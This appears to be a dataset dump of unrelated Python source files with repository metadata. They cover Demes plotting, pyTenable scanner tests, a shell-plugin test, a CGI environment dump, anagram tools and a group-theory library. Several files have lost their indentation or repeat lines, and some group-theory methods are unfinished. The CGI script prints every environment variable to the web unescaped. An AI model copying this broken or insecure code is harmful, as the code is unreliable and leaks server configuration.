    ax.spines["top"].set_visible(False)
    if invert_x:
        ax.spines["left"].set_visible(False)
        ax.invert_xaxis()
        ax.yaxis.tick_right()
        ax.yaxis.set_label_position("right")
    else:
        ax.spines["right"].set_visible(False)
    ax.set_xlabel(f"time ago ({graph.time_units})")
    # ax.set_ylabel("N", rotation=0, ha="left" if invert_x else "right")
    ax.set_ylabel("deme\nsize", rotation=0, labelpad=20)
    if log_x:
        ax.set_xscale("log", base=10)
    if log_y:
        ax.set_yscale("log", base=10)
    ax.figure.tight_layout()
    return ax
def parse_args():
    """Build and parse the command-line arguments for this plotting script."""
    import argparse

    parser = argparse.ArgumentParser(
        description="Plot N(t) for all demes in a Demes graph."
    )
    parser.add_argument(
        "--inf-ratio",
        type=float,
        default=0.1,
        help=(
            "The proportion of the horizontal axis that will be "
            "used for the time interval which stretches towards infinity "
            "[default=%(default)s]."
        ),
    )
    parser.add_argument(
        "--invert-x",
        action="store_true",
        help=(
            "Invert the horizontal axis. "
            "I.e. draw the past on the left, the present on the right. "
            "The vertical axis ticks/labels will also be drawn on the right. "
        ),
    )
    parser.add_argument(
        "--log-x", action="store_true", help="Use a log scale for the horizontal axis."
    )
    parser.add_argument(
        "--log-y", action="store_true", help="Use a log scale for the vertical axis."
    )
    parser.add_argument(
        "--annotate-epochs",
        action="store_true",
        help=("Label each deme's epochs. " "Not recommended for more than one deme."),
    )
    parser.add_argument(
        "yaml_filename",
        metavar="demes.yaml",
        help="The Demes graph to plot.",
    )
    parser.add_argument(
        "plot_filename",
        metavar="figure.pdf",
        help=(
            "Output filename for the figure. "
            "Any file extension supported by matplotlib may be provided "
            "(pdf, eps, png, svg)."
        ),
    )
    return parser.parse_args()
if __name__ == "__main__":
    # Command-line entry point: load the graph, draw it, save the figure.
    args = parse_args()
    graph = demes.load(args.yaml_filename)
    ax = size_history(
        graph,
        inf_ratio=args.inf_ratio,
        invert_x=args.invert_x,
        log_x=args.log_x,
        log_y=args.log_y,
        annotate_epochs=args.annotate_epochs,
    )
    ax.figure.savefig(args.plot_filename)
| [
"graham.gower@gmail.com"
] | graham.gower@gmail.com |
dace21adfb00aaf1f2863a3e40f9256a2a67b538 | 2d6d24c0bfee13fc4682dee52075e78a552a8d1c | /tests/io/test_scanners.py | 88b4c30ae125ae42fe97d5aa7678fd851b13a7be | [
"MIT"
] | permissive | sbiradarctr/pyTenable | b890875c5df3a1da676cebd57af51bc49666a7d2 | 2a6930cd7b29036780c291581d89ab33c0fd6679 | refs/heads/master | 2023-05-06T09:20:43.580412 | 2021-05-31T09:05:11 | 2021-05-31T09:05:11 | 371,701,521 | 0 | 0 | MIT | 2021-05-28T12:58:52 | 2021-05-28T12:58:52 | null | UTF-8 | Python | false | false | 7,003 | py | from tenable.errors import *
from ..checker import check, single
import uuid, pytest
@pytest.mark.vcr()
def test_scanner_control_scans_scanner_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.control_scan('nope', str(uuid.uuid4()), 'stop')
@pytest.mark.vcr()
def test_scanner_control_scans_scan_uuid_typeerror(api):
with pytest.raises(TypeError):
api.scanners.control_scan(1,1,'stop')
@pytest.mark.vcr()
def test_scanner_control_scans_action_typeerror(api):
with pytest.raises(TypeError):
api.scanners.control_scan(1,str(uuid.uuid4()), 1)
@pytest.mark.vcr()
def test_scanner_control_scans_action_unexpectedvalue(api):
with pytest.raises(UnexpectedValueError):
api.scanners.control_scan(1, str(uuid.uuid4()), 'nope')
@pytest.mark.vcr()
def test_scanner_control_scans_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.control_scan(1,
'c5e3e4c9-ee47-4fbc-9e1d-d6f39801f56c', 'stop')
@pytest.mark.vcr()
def test_scanner_control_scans_permissionerror(stdapi):
with pytest.raises(PermissionError):
stdapi.scanners.control_scan(1,
'c5e3e4c9-ee47-4fbc-9e1d-d6f39801f56c', 'stop')
@pytest.mark.vcr()
def test_scanner_delete_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.delete('nope')
@pytest.mark.vcr()
def test_scanner_delete_notfound(api):
with pytest.raises(NotFoundError):
api.scanners.delete(1)
@pytest.mark.vcr()
def test_scanner_delete_permissionerror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.delete(scanner['id'])
@pytest.mark.skip(reason="We don't want to actually delete scanners.")
def test_scanner_delete(api, scanner):
api.scanners.delete(scanner['id'])
@pytest.mark.vcr()
def test_scanner_details_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.details('nope')
@pytest.mark.vcr()
def test_scanner_details_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.details(1)
@pytest.mark.vcr()
def test_scanner_details_permissionerror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.details(scanner['id'])
@pytest.mark.vcr()
def test_scanner_details(api, scanner):
    """scanners.details() returns a record with the expected fields/types."""
    s = api.scanners.details(scanner['id'])
    check(s, 'id', int)
    check(s, 'uuid', 'scanner-uuid')
    check(s, 'name', str)
    check(s, 'type', str)
    check(s, 'status', str)
    check(s, 'scan_count', int)
    check(s, 'engine_version', str)
    check(s, 'platform', str)
    check(s, 'loaded_plugin_set', str)
    check(s, 'owner', str)
    check(s, 'pool', bool)
@pytest.mark.vcr()
def test_scanner_edit_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.edit('nope')
@pytest.mark.vcr()
def test_sanner_edit_plugin_update_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], force_plugin_update='yup')
@pytest.mark.vcr()
def test_scanner_edit_ui_update_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], force_ui_update='yup')
@pytest.mark.vcr()
def test_scanner_edit_finish_update_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], finish_update='yup')
@pytest.mark.vcr()
def test_scanner_edit_registration_code_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], registration_code=False)
@pytest.mark.vcr()
def test_scanner_edit_aws_update_typeerror(api, scanner):
with pytest.raises(TypeError):
api.scanners.edit(scanner['id'], aws_update_interval='nope')
@pytest.mark.vcr()
@pytest.mark.xfail(raises=PermissionError)
def test_scanner_edit_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.edit(1, force_ui_update=True)
@pytest.mark.vcr()
def test_scanner_edit_permissionserror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.edit(scanner['id'], force_ui_update=True)
@pytest.mark.vcr()
@pytest.mark.xfail(raises=PermissionError)
def test_scanner_edit(api, scanner):
api.scanners.edit(scanner['id'], force_plugin_update=True)
@pytest.mark.vcr()
def test_scanner_get_aws_targets_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.get_aws_targets('nope')
@pytest.mark.vcr()
def test_scanner_get_aws_targets_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.get_aws_targets(1)
@pytest.mark.vcr()
@pytest.mark.xfail(raises=NotFoundError)
def test_scanner_get_aws_targets_permissionerror(stdapi):
with pytest.raises(PermissionError):
stdapi.scanners.get_aws_targets(1)
@pytest.mark.skip(reason="No AWS Environment to test against.")
@pytest.mark.vcr()
def test_scanner_get_aws_targets(api, scanner):
pass
@pytest.mark.vcr()
def test_scanner_key_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.get_scanner_key('nope')
@pytest.mark.vcr()
def test_scanner_key(api, scanner):
assert isinstance(api.scanners.get_scanner_key(scanner['id']), str)
@pytest.mark.vcr()
def test_get_scans_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.get_scans('nope')
@pytest.mark.vcr()
def test_get_scans_notfounderror(api):
with pytest.raises(NotFoundError):
api.scanners.get_scans(1)
@pytest.mark.vcr()
def test_get_scans_permissionerror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.get_scans(scanner['id'])
@pytest.mark.vcr()
def test_get_scans(api, scanner):
assert isinstance(api.scanners.get_scans(scanner['id']), list)
@pytest.mark.vcr()
def test_list_scanners_permissionerror(stdapi):
with pytest.raises(PermissionError):
stdapi.scanners.list()
@pytest.mark.vcr()
def test_list_scanners(api):
assert isinstance(api.scanners.list(), list)
@pytest.mark.vcr()
def test_link_state_id_typeerror(api):
with pytest.raises(TypeError):
api.scanners.toggle_link_state('nope', True)
@pytest.mark.vcr()
def test_link_state_linked_typeerror(api):
with pytest.raises(TypeError):
api.scanners.toggle_link_state(1, 'nope')
@pytest.mark.vcr()
def test_link_state_permissionerror(stdapi, scanner):
with pytest.raises(PermissionError):
stdapi.scanners.toggle_link_state(scanner['id'], True)
@pytest.mark.vcr()
def test_link_state(api, scanner):
api.scanners.toggle_link_state(scanner['id'], True)
@pytest.mark.vcr()
def test_scanners_get_permissions(api, scanner):
perms = api.scanners.get_permissions(scanner['id'])
assert isinstance(perms, list)
for p in perms:
check(p, 'type', str)
check(p, 'permissions', int)
@pytest.mark.vcr()
def test_scanner_edit_permissions(api, scanner, user):
api.scanners.edit_permissions(scanner['id'],
{'type': 'default', 'permissions': 16},
{'type': 'user', 'id': user['id'], 'permissions': 16}) | [
"steve@chigeek.com"
] | steve@chigeek.com |
df3910edec0018e22e73d750172933db0402f750 | 6a22b7e73dc2ff6c089b727d0a3858241846f8df | /Systems/esh-spring-2015.git/src/plugins/systemInfo_test.py | 79044de0ccade054d72a819f02d293037742a7cd | [
"MIT"
] | permissive | mikefeneley/school | fe48ee989ac83d4836ce93538cbe51496f709abe | 5156f4537ca76782e7ad6df3c5ffe7b9fb5038da | refs/heads/master | 2021-06-10T01:52:21.148937 | 2016-12-23T12:39:32 | 2016-12-23T12:39:32 | 72,551,482 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import sys, imp, atexit, os
sys.path.append("/home/courses/cs3214/software/pexpect-dpty/");
import pexpect, shellio, signal, time, os, re, proc_check
# Determine the path this file is in
thisdir = os.path.dirname(os.path.realpath(__file__))
#Ensure the shell process is terminated
def force_shell_termination(shell_process):
    """atexit hook: make sure the spawned shell process is terminated.

    Closes the process that was handed in (the atexit registration supplies
    shell_process=c) instead of reaching for the module-level ``c``, so the
    hook still works if the global is rebound or not yet defined.
    """
    shell_process.close(force=True)
# pulling in the regular expression and other definitions
# this should be the eshoutput.py file of the hosting shell, see usage above
definitions_scriptname = sys.argv[1]
def_module = imp.load_source('', definitions_scriptname)

# you can define logfile=open("log.txt", "w") in your eshoutput.py if you want logging!
logfile = None
if hasattr(def_module, 'logfile'):
    logfile = def_module.logfile

# spawn an instance of the shell, note the -p flags (loads plugins from thisdir)
c = pexpect.spawn(def_module.shell, drainpty=True, logfile=logfile, args=['-p', thisdir])
atexit.register(force_shell_termination, shell_process=c)

# set timeout for all following 'expect*' calls to 5 seconds
c.timeout = 5

#############################################################################
#
# Actual Test
# Expect a prompt, run the systemInfo plugin, and check for its banner line.
assert c.expect(def_module.prompt) == 0, "Shell did not print expected prompt (1)"
c.sendline("systemInfo")
assert c.expect('------------------------------------------------\r\n') == 0, "Shell did not print out expected values";
assert c.expect(def_module.prompt) == 0, "Shell did not print expected prompt (2)"
shellio.success()
| [
"michael.j.feneley@gmail.com"
] | michael.j.feneley@gmail.com |
365f848ad8dde1db19f683afd8439f0362e34fb7 | e3a674666de18e3b722bfd36e54d6a32e3f0b726 | /html/default.py | 6971548d1f71ed3f49da66c818ddae27850fbfbf | [] | no_license | sauloaldocker/lamp | 92d52c3105cd1d00d816138a64de66643fda67c3 | 9088f899e9a4e7e04941518041e10630cfdf71f1 | refs/heads/master | 2021-01-20T04:36:21.783064 | 2017-04-02T13:22:02 | 2017-04-02T13:22:02 | 21,629,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-# enable debugging
import cgitb
import os
import sys
cgitb.enable()

# CGI debug page (Python 2): dump argv, the process environment and
# sys.path as simple HTML tables.
print "Content-Type: text/html;charset=utf-8"
print

print "<h1>argv</h1>"
print "<table>"
for k in sys.argv:
    print "<tr><td>%s</td></tr>" % (k)
print "</table>"

print "<h1>environ</h1>"
print "<table>"
for k in os.environ:
    # NOTE(review): values are emitted without HTML escaping; cgi.escape
    # would be safer if untrusted values can appear in the environment.
    print "<tr><td><b>%s</b></td><td>%s</td></tr>" % (k, os.environ[k])
print "</table>"

print "<h1>path</h1>"
print "<table>"
for k in sys.path:
    print "<tr><td>%s</td></tr>" % (k)
print "</table>"
| [
"sauloal@gmail.com"
] | sauloal@gmail.com |
a3bb3ecefb0daf9c42cee95e85b7561e754a16d4 | 19126b16eb2678164c1bc282e5b9c86216b483aa | /process.py | f9f46504f1d9b85e4d31638e02b6fde00cc7fe34 | [] | no_license | lucjon/unescape | 366e5ef6914533bf4a6b85391fb7681ce1500203 | cf618144a0efc5fb3f94ed6e5c472322ef223ab2 | refs/heads/master | 2020-03-30T06:42:46.411895 | 2010-12-07T21:16:05 | 2010-12-07T21:16:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | print 'var _entities = {'
f = open('entities')
for entity in f:
s = entity.split('\t')
print '\t"%s": "%s",' % (s[0], s[1])
f.close()
print '};'
| [
"lucas@lucasjones.co.uk"
] | lucas@lucasjones.co.uk |
ab6a077030d7e71350326b60b2622c761eac3670 | ca539b0df7ca5a91f80b2e2f64e7379e69243298 | /87.py | 219641b62a1f8827bc7e6a09e66208ccf7bb59c1 | [] | no_license | yorick76ee/leetcode | 9a9e5d696f3e32d9854c2ed9804bd0f98b03c228 | d9880892fe15f9bb2916beed3abb654869945468 | refs/heads/master | 2020-03-18T22:59:29.687669 | 2016-07-18T19:56:55 | 2016-07-18T19:56:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,452 | py | class Solution(object):
class Solution(object):
    """Scramble-string check (LeetCode 87) via memoized recursion.

    s2 is a scramble of s1 if the binary tree obtained by repeatedly
    splitting s1 can be turned into s2 by swapping children of some nodes.
    """

    def lettercount(self, s1, s2):
        """Return True iff s1 and s2 contain the same multiset of letters.

        Sorting both strings is an O(n log n) check and replaces the
        original hand-rolled double dictionary comparison.
        """
        return sorted(s1) == sorted(s2)

    def recursive(self, s1, s2):
        """Return True iff s2 is a scramble of s1; results cached in self.dp."""
        if (s1, s2) in self.dp:
            return self.dp[(s1, s2)]
        if s1 == s2:
            self.dp[(s1, s2)] = True
            return True
        # A scramble must be an anagram; this also rejects unequal lengths
        # of single characters.
        if len(s1) == 1 or not self.lettercount(s1, s2):
            self.dp[(s1, s2)] = False
            return False
        n = len(s1)
        result = False
        for i in range(1, n):
            # Children not swapped: s1[:i] ~ s2[:i] and s1[i:] ~ s2[i:].
            if self.recursive(s1[:i], s2[:i]) and self.recursive(s1[i:], s2[i:]):
                result = True
                break
            # Children swapped: s1[:i] ~ s2[n-i:] and s1[i:] ~ s2[:n-i].
            if self.recursive(s1[:i], s2[n - i:]) and self.recursive(s1[i:], s2[:n - i]):
                result = True
                break
        self.dp[(s1, s2)] = result
        return result

    def isScramble(self, s1, s2):
        """
        :type s1: str
        :type s2: str
        :rtype: bool
        """
        self.dp = {}
        return self.recursive(s1, s2)
# Ad-hoc smoke test (Python 2 print syntax).
if __name__ == '__main__':
    wds= Solution()
    print wds.isScramble('oatzzffqpnwcxhejzjsnpmkmzngneo','acegneonzmkmpnsjzjhxwnpqffzzto')
| [
"641614152@qq.com"
] | 641614152@qq.com |
c07d3081696dfc63bf3149aacfa29ae61b1791ba | cc69873bda24115753417a962773798662585c5e | /AnagramSolver/AnagramSolver/views.py | 3b4baf3c7805c920deb1198154a27eda7878990b | [] | no_license | nguyenvinh2/AnagramSolver | e6930096a81b3c0280ab85c0b78232d13c0967be | f6deba01622fe6b298eab3a32a1e1e9633e4c6d7 | refs/heads/master | 2020-04-14T06:45:49.357938 | 2019-01-03T19:44:28 | 2019-01-03T19:44:28 | 163,695,195 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,803 | py | """
Routes and views for the flask application.
"""
from datetime import datetime
from flask import render_template
from AnagramSolver import app
from flask import Flask, request
import json
import requests
class Word():
    """Value object pairing an anagram with its dictionary definition.

    Instances are handed to the index template, which reads .word and
    .definition (see anagram()).
    """
    def __init__(self, word, definition):
        self.word = word              # the anagram string
        self.definition = definition  # definition text from dictionary()
def find_anagram(word):
    """Return every permutation of *word*.

    For a string of length <= 1 the string itself is returned; otherwise a
    list of permutation strings is built recursively (duplicates appear
    when *word* has repeated letters).
    """
    if len(word) <= 1:
        return word
    perms = []
    first = word[0:1]
    for tail_perm in find_anagram(word[1:]):
        # Insert the first character at every position of each permutation
        # of the remaining characters.
        for pos in range(len(word)):
            perms.append(tail_perm[:pos] + first + tail_perm[pos:])
    return perms
@app.route('/')
@app.route('/home')
def home():
    """Renders the home page."""
    # `year` feeds the copyright/footer text in the template.
    return render_template('index.html',
        title='Home Page',
        year=datetime.now().year,)
@app.route('/anagram', methods=['POST'])
def anagram():
    """Handle the anagram form: look up anagrams and their definitions.

    Fetches the best anagrams of the submitted word from anagramica.com,
    resolves a definition for each via dictionary(), and re-renders the
    index page with the resulting Word objects.
    """
    word = request.form['getWord']
    print(word)
    # NOTE(review): `word` is interpolated into the URL unescaped; consider
    # urllib quoting / validating the user input.
    stringURL = 'http://www.anagramica.com/best/' + word
    getJSON = requests.get(stringURL)
    anagram = json.loads(getJSON.text)
    wordList = []
    for eachword in anagram['best']:
        wordList.append(Word(eachword, dictionary(eachword)))
    return render_template('index.html',
        title = 'Home Page',
        word = word,
        year = datetime.now().year,
        anagrams = wordList)
def dictionary(word):
    """Return the first Oxford Dictionaries definition of *word*.

    NOTE(review): app_id/app_key are placeholders and must be configured
    (ideally from the environment, not source).  A failed request or a word
    with no entry raises (JSONDecodeError/KeyError/IndexError) — there is
    no error handling here.
    """
    app_id = 'Your Oxford API ID'
    app_key = 'You Oxford API KEY'
    language = 'en'
    url = 'https://od-api.oxforddictionaries.com:443/api/v1/entries/' + language + '/' + word.lower()
    print(word)
    response = requests.get(url, headers = {'app_id': app_id, 'app_key': app_key})
    # Debug output of the raw API response.
    print(response.text)
    print("Code {}\n".format(response.status_code))
    getJSON = json.loads(response.text)
    # Drill into the first sense of the first entry of the first result.
    definition = getJSON['results'][0]['lexicalEntries'][0]['entries'][0]['senses'][0]['definitions'][0]
    return definition
| [
"nguyenv2@outlook.com"
] | nguyenv2@outlook.com |
f61a8aa843d980025a0559ae59a7f1b2df92821a | c122279ed10ecf9a5b7b91789591179a30f2e543 | /src/group.py | 95d0f7b9f5a852501c7aa37d47d1e19e3fafcb5f | [
"MIT"
] | permissive | MrCamoga/Finite-Groups-2 | 15fa54fa9008d29ca1362d952b5744f279e19577 | 5e52102a423a8ff4eed0cbf59617b6fe999e7ef3 | refs/heads/master | 2021-02-16T22:37:00.047213 | 2020-11-11T14:15:25 | 2020-11-11T14:15:25 | 245,049,648 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,292 | py | from functools import reduce
from sympy import isprime, gcd, lcm, factorint
from operator import itemgetter
from random import randint
import typing
"""
TODO:
isNormal ✓
Inn(G) ✓
conjugacy class ✓
Z(G) ✓
centralizer ✓
left/right cosets ✓
quotient group ✓
powers of an element ✓
symmetric group ✓
alternating group ✓
normalizer ✓
commutator [g,h] = g-1h-1gh ✓
false witnesses group ✓
conjugacy classes ✓
Out(G) = Aut(G)/Inn(G) ✓
fast inverse ✓
GL, PGL, PSL ✓
automorphism from generators ✓
generalized symmetric group ✓
generalized quaternion group ✓
dicyclic group ✓
central product ✓
homomorphisms class ✓
subset/subgroup class ✓
isCyclic ✓
Aut(G) ✓
GL ✓
PGL ✓
Out(G) ✓
commutator subgroup
wreath product
change the semidirect product f from array of automorphisms to an actual function
derived series
isSolvable
hyperoctahedral group
lower central series
quotient of group whose elements are lists cannot return cosets because lists are not hashable
metacyclic group
determinant function
SO,O
define group from generators and relations, for example G = < a,b,c,d | a3=b3=c3=d3=1, ab=ba, cac-1=ab-1, ad=da, bc=cb, bd=db, dcd-1=ab-1c >
fast order for predefined groups
Write permutations as disjoint cycles (enumerate partitions of n etc), this could be useful for conjugacy classes
Change Symmetric.__lehmerinv and Alternating.__index from O(n^2) to O(n)
compute orders in O(n)
isIsomorphic (check cardinals, cyclic, abelian, element orders conjugacy classes,...)
isSimple
Aut(G) (as subgroup of Sn)
Aut, Inn, Out of direct, semidirect, central products, quotient group,...
Sylow subgroups, normal subgroups, subgroups
lattice of subgroups ----> get maximal subgroups
get set of generators
reduce set of generators on Group.subgroup()
composition series
quotient group: is abelian / is cyclic / simple
character table
optimize Units()
simple groups
sporadic groups
Groups that don't work yet:
Subgroup
SL, PSL
Aut2
Holomorph: needs Aut2
Duplicated methods/classes:
centralizer2 >?? centralizer
Units2 > Units
"""
class Group:
    """Finite group defined by its order and a binary operation.

    Elements appear to be the integers 0..n-1 (methods are hinted with
    ``int`` and the identity is derived from element 0) — the iteration
    protocol (`for g in self`) is defined elsewhere in this class; TODO
    confirm.  The boolean flags are lazily-computed caches (None = unknown).
    """
    def __init__(self, n: int, e: callable, op: callable):
        self.element = e      # maps an element index to its representation
        self.op = op          # binary group operation
        self.card = n         # order of the group, |G|
        self.abelian = None   # cached: is the group abelian?
        self.cyclic = None    # cached: is the group cyclic?
        self.simple = None    # cached: is the group simple?
        self.id = None        # cached identity element (see identity())
    def __len__(self):
        """len(G) is the group order |G|."""
        return self.card
def multiply(self, H: iter, K: iter) -> set:
"""
HK = {h*k : h∈H, k∈K}
"""
HK = set()
for h in H:
for k in K:
HK.add(self.op(h, k))
return HK
def order(self, g: int) -> int:
p = g
order = 1
while True:
p = self.op(p, g)
if p == g:
return order
order += 1
    def exponent(self) -> int:
        """
        Exponent of the group: lcm of all element orders.
        """
        # orders(True) returns {order: {elements}}, so its keys are exactly
        # the distinct element orders.
        return lcm(list(self.orders(True).keys()))
def subgroup(self, gens: typing.Union[list,set]) -> set:
"""
Returns subgroup generated by gens
"""
H = {self.identity()}
size = 0
while len(H) != size:
size = len(H)
for g in gens:
for h in list(H):
H.add(self.op(h,g))
return H
def powers(self, g: int) -> list:
"""
<g> = {g^k : k∈N}
"""
p = [g]
while True:
t = self.op(p[-1], g)
if t == g:
return p
p.append(t)
def identity(self) -> int:
"""
Returns identity element
"""
if self.id is None:
self.id = self.powers(0)[-1]
return self.id
    def automorphism(self, genimg: dict) -> list:
        """
        Get automorphism defined by the images of the generators
        genimg = {g:f(g) for g in gens}

        The map is extended multiplicatively (f(h*g) = f(h)*f(g)) over the
        closure of the generator set, and returned as a list indexed by
        element.  NOTE(review): assumes the keys of genimg generate the
        whole group — otherwise |H| never reaches self.card and the loop
        does not terminate.
        """
        bijection = [self.identity()]*self.card
        H = {self.identity()}
        for g, f in genimg.items():
            bijection[g] = f
        while len(H) != self.card:
            for g in genimg.keys():
                for h in list(H):
                    p = self.op(h, g)
                    if p not in H:
                        # f(h*g) = f(h)*f(g) extends the map consistently.
                        bijection[p] = self.op(bijection[h], bijection[g])
                        H.add(p)
        return bijection
    def Syl(self, p: int) -> typing.List[set]:
        """
        Returns all sylow p-subgroups

        NOTE(review): unfinished — the method factors card = p^k * m and
        builds the set of candidate subgroup counts, but never constructs
        or returns any subgroup (it falls through and returns None).
        """
        if not isprime(p):
            return None
        m = self.card
        k = 0
        # Factor out the largest power of p: card = p^k * m with p ∤ m.
        while m % p == 0:
            m //= p
            k += 1
        # Candidates satisfying n ≡ 1 (mod p) and n | m.
        order = {o for o in range(1, m+1, p) if m % o == 0}
        # if k == 0:
        #     return None
##
## def centralizerSet(self,S):
## """
## {g∈G : gs=sg ∀s∈S}
## """
    def centralizer(self, s: int) -> set:
        """
        Centralizer C(s) = {g∈G : gs=sg}.

        Optimisation: whenever some g commutes with s, the whole cyclic
        subgroup <g> commutes with s, so all powers of g are added to C at
        once and removed from the candidate pool H.
        """
        if self.isAbelian():
            return {g for g in self}
        C = {self.identity(), s}
        H = {g for g in self}
        while len(H) > 0:
            g = H.pop()
            if self.op(g, s) == self.op(s, g):
                powers = self.powers(g)
                C.add(g)
                for p in powers:
                    if p not in H:
                        continue
                    H.remove(p)
                    C.add(p)
        return C
def centralizer2(self, s: int) -> set:
return {g for g in self if self.op(g, s) == self.op(s, g)}
    def normalizer(self, H: typing.Union[set,list]) -> set:
        """
        Normalizer N(H) = {g∈G : gH = Hg}, by direct coset comparison.
        """
        if self.isAbelian():
            return {g for g in self}
        return {g for g in self if self.leftcoset(H, g) == self.rightcoset(H, g)}
    def normalizer2(self, H: typing.Union[set,list]) -> set:
        """
        Normalizer of H; like normalizer(), but whenever a normalizing
        element g is found, N absorbs the product N*<g> in one step.
        """
        if self.isAbelian():
            return {g for g in self}
        N = set(H)
        for g in self:
            if g in N:
                continue
            if self.leftcoset(H, g) == self.rightcoset(H, g):
                # Collect the powers of g not already in N ...
                powers = [g]
                p = self.op(g, g)
                while p not in N:
                    powers.append(p)
                    p = self.op(p, g)
                # ... then close N under right-multiplication by them.
                for n in list(N):
                    for m in powers:
                        N.add(self.op(n, m))
        return N
    def orders(self, Dict: bool = False) -> typing.Union[dict,list]:
        """
        Orders of all elements.

        With Dict=False returns [order(g) for g in G]; with Dict=True
        returns {order: set of elements with that order}.  Uses
        ord(g^(i+1)) = ord(g) / gcd(i+1, ord(g)) so one powers() walk
        yields the order of every power of g.
        """
        o = {self.identity(): 1}
        elements = {g for g in self}
        while len(elements) > 0:
            g = elements.pop()
            powers = self.powers(g)
            orderg = len(powers)
            o[g] = orderg
            for i in range(len(powers)):
                if powers[i] in o:
                    continue
                o[powers[i]] = orderg//gcd(i+1, orderg)
                elements.remove(powers[i])
        if Dict:
            # Invert the map: order -> set of elements of that order.
            h = dict()
            for k, v in o.items():
                h.setdefault(v, set()).add(k)
            return h
        return [o[i] for i in self]
    def center(self) -> set:
        """
        Z(G) = {g∈G : gs=sg ∀s∈G}
        """
        if self.abelian:
            return {k for k in self}
        Z = {self.identity()}
        for g in self:
            if g in Z:
                continue
            # Reject g as soon as one element fails to commute with it
            # (elements already in Z are known to commute).
            b = False
            for s in self:
                if s in Z:
                    continue
                if self.op(s, g) != self.op(g, s):
                    b = True
                    break
            if b:
                continue
            # g is central, hence so is every power of g; collect the powers
            # of g not yet accounted for ...
            powers = [g]
            while True:
                t = self.op(g, powers[-1])
                if t == self.identity() or t in Z:
                    break
                powers.append(t)
            # ... and close Z under products with them (Z is a subgroup).
            for s in list(Z):
                for x in powers:
                    Z.add(self.op(x, s))
        return Z
    def derivedSubgroup(self):
        """
        Commutator subgroup
        [G,G] = {g-1h-1gh : g,h∈G}

        Returned as a groups.Subgroup (see commutatorSub).
        """
        return self.commutatorSub(self,self)
    def commutatorSub(self,H,K):
        """
        Commutator subgroup of subgroups H and K
        [H,K] = {h-1k-1hk : h∈H,k∈K}

        NOTE(review): only the raw set of commutators (plus e) is collected
        and wrapped in a Subgroup; the subgroup *generated* by the
        commutators can be strictly larger in general — confirm Subgroup
        performs the closure.
        """
        from groups import Subgroup
        S = {self.identity()}
        for h in H:
            for k in K:
                S.add(self.commutator(h,k))
        return Subgroup(self,H=S)
    def derivedSeries(self):
        """
        G_{0} = G
        G_{i+1} = [G_{i},G_{i}] = G_{i}'

        Returns the chain until it stabilises; G is solvable iff the last
        term is trivial.
        """
        S = [self]
        from groups import Subgroup
        if self.isAbelian():
            # Abelian: the series is G > {e} (or just [G] for the trivial group).
            if self.card > 1:
                return S + [Subgroup(self,H=[self.identity()])]
            else:
                return S
        while True:
            C = S[-1].derivedSubgroup()
            if len(C) == len(S[-1]):
                return S
            S.append(C)
def upperCentralSeries(self):
"""
Z^{0}(G) = {e}
Z^{i+1}(G) = π^{-1}(Z(G/Z^{i}(G))) where π is the natural projection G -> G/Z^{i}(G)
"""
if self.card == 1:
return [{self.identity()}]
S = [{self.identity()},self.center()]
Q = self/S[-1]
while True:
Z = Q.center()
N = set().union(*(Q.eindex(k) for k in Z))
if len(N) == len(S[-1]):
return S
S += [N]
Q = self/N
def lowerCentralSeries(self): # FIX
"""
G_{0} = G
G_{i+1} = [G_{i},G]
"""
S = [set(self)]
if self.isAbelian():
if self.card > 1:
return S + [Subgroup(self,H=[self.identity()])]
else:
return S
while True:
C = self.commutatorSub(S[-1],self)
if len(C) == len(S[-1]):
return S
S.append(C)
	def isSolvable(self) -> bool:
		"""True iff G is solvable (its derived series reaches the trivial group)."""
		# Every group of order < 60 is solvable (A5, of order 60, is the
		# smallest non-solvable group).
		if self.card < 60:
			return True
		if all(p == 1 for p in factorint(self.card).values()): # Square free order => solvable
			return True
		return len(self.derivedSeries()[-1]) == 1
	def isPerfect(self) -> bool:
		"""
		[G,G] == G

		The derived series has length 1 exactly when G equals its own
		derived subgroup.
		"""
		return len(self.derivedSeries()) == 1
	def perfectCore(self):
		"""
		Largest perfect subgroup. Limit of the derived series
		"""
		return self.derivedSeries()[-1]
	def nilpotencyClass(self) -> int:
		"""
		Nilpotency class of the group
		Returns -1 if not nilpotent
		"""
		s = self.upperCentralSeries()
		if len(s[-1])==self.card:
			return len(s)-1
		return -1
	def isNilpotent(self) -> bool:
		"""
		Upper central series end in the whole subgroup
		"""
		# Finite p-groups are always nilpotent.
		if self.isPGroup():
			return True
		return len(self.upperCentralSeries()[-1]) == self.card
	def isPGroup(self) -> bool:
		"""True iff |G| is a prime power."""
		return len(factorint(self.card)) == 1
	def pow(self, g: int, i: int) -> int:
		"""
		g^i

		Binary exponentiation (square-and-multiply); returns the identity
		when i == 0.
		"""
		p = self.identity()
		while i > 0:
			if i & 1:
				p = self.op(p, g)
			g = self.op(g, g)
			i >>= 1
		return p
	def inverse(self, g: int) -> int:
		"""
		g^-1

		Walks the cyclic subgroup of g: the element just before the
